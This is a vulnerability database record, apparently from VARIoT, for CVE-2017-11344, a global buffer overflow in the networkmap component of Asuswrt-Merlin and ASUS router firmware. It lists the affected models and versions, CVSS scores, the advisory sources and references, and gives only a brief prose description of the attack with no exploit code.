      "@id": "https://www.variotdbs.pl/vuln/VAR-201707-0387",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-ac68u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n12\\+",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n56u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.378.7177"
          },
          {
            "model": "rt-ac66u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac5300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n18u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt ac1200g",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3167"
          },
          {
            "model": "rt ac1900p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac56u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n12hp",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.2943"
          },
          {
            "model": "rt ac1200gu",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.5577"
          },
          {
            "model": "rt-n12hp b1",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3479"
          },
          {
            "model": "rt-ac51u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n16",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac3100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac1200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac52u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.4180"
          },
          {
            "model": "rt-ac68p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n66u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac53",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9883"
          },
          {
            "model": "rt-n12d1",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac88u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac3200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt n12\\+ pro",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac58u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7485"
          },
          {
            "model": "rt-ac55u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac66u b1",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt ac1200g",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt ac1200gu",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt ac1900p",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt n12+ pro",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac1200",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac3100",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac3200",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac51u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac52u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac53",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac5300",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac55u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac56u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac58u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac66u b1",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac68p",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac88u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12+",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12d1",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12hp",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n16",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n18u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n300",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac5300",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1900p",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac52u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac51u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n18u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac3200",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1200gu",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac3100",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1200g",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac1200",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac53",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12d1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12+",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt n12+ pro",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n16",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n300",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac55u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac56u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac58u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u b1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac88u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac68p",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3479"
          },
          {
            "model": "rt-n12d1",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n12\\+",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n12hp",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.2943"
          },
          {
            "model": "rt-ac53",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9883"
          },
          {
            "model": "rt n12\\+ pro",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac1200",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac3200",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n300",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-768"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11344"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200g_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200gu_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1900p_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_n12%2B_pro_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac1200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3100_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac51u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac52u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac53_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac5300_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac55u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac56u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac58u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_b1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68p_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac88u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12%2B_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12d1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_b1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n16_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n18u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n300_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n56u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n66u_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          }
        ]
      },
      "cve": "CVE-2017-11344",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2017-11344",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2017-35393",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "VHN-101757",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.8,
                "id": "CVE-2017-11344",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-11344",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-11344",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-35393",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201707-768",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-101757",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101757"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-768"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11344"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Global buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to write shellcode at any address in the heap; this can be used to execute arbitrary code on the router by hosting a crafted device description XML document at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-11344"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101757"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2017/07/14/3",
            "trust": 3.1
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11344",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-768",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-35393",
            "trust": 0.6
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-97015",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-101757",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101757"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-768"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11344"
          }
        ]
      },
      "id": "VAR-201707-0387",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101757"
          }
        ],
        "trust": 1.342782942
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:36:49.576000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://asuswrt.lostrealm.ca/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-101757"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11344"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://www.openwall.com/lists/oss-security/2017/07/14/3"
          },
          {
            "trust": 1.1,
            "url": "https://asuswrt.lostrealm.ca/changelog"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11344"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-11344"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101757"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-768"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11344"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101757"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-768"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11344"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-11-29T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          },
          {
            "date": "2017-07-17T00:00:00",
            "db": "VULHUB",
            "id": "VHN-101757"
          },
          {
            "date": "2017-08-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          },
          {
            "date": "2017-07-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201707-768"
          },
          {
            "date": "2017-07-17T13:18:20.923000",
            "db": "NVD",
            "id": "CVE-2017-11344"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-11-29T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-35393"
          },
          {
            "date": "2017-12-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-101757"
          },
          {
            "date": "2017-08-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          },
          {
            "date": "2017-09-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201707-768"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-11344"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-768"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  ASUS For devices  Asuswrt-Merlin Firmware and  ASUS Firmware network map global buffer overflow vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005983"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer overflow",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-768"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201707-0400

    Vulnerability from variot - Updated: 2025-04-20 23:36

